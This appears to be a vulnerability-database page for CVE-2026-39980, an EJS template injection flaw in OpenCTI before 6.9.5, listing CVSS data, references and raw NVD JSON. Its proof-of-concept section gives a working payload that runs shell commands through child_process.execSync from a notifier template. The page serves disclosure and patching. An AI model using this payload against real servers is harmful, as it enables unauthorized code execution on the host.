CVE-2026-39980

Description

OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to 6.9.5, the safeEjs.ts file does not properly sanitize EJS templates. Users with the Manage customization capability can run arbitrary JavaScript in the context of the OpenCTI platform process during notifier template execution. This vulnerability is fixed in 6.9.5.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:* - VULNERABLE

OpenCTI < 6.9.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC: Malicious EJS template snippet for OpenCTI notification
// Precondition: Attacker needs 'Manage customization' permission
// Action: Inject this payload into a notifier template body

<%- global.process.mainModule.require('child_process').execSync('id').toString() %>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39980
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39980
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39980/
[4] VulDB https://vuldb.com/cve/CVE-2026-39980
[5] https://github.com/OpenCTI-Platform/opencti/releases/tag/6.9.5
[6] https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-jv9r-jw2f-rhrf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39980", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:17:02.203", "lastModified": "2026-04-22T00:27:12.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to 6.9.5, the safeEjs.ts file does not properly sanitize EJS templates. Users with the Manage customization capability can run arbitrary JavaScript in the context of the OpenCTI platform process during notifier template execution. This vulnerability is fixed in 6.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.9.5", "matchCriteriaId": "62B2280A-9179-4CDB-A6B4-EB11173EF85C"}]}]}], "references": [{"url": "https://github.com/OpenCTI-Platform/opencti/releases/tag/6.9.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-jv9r-jw2f-rhrf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}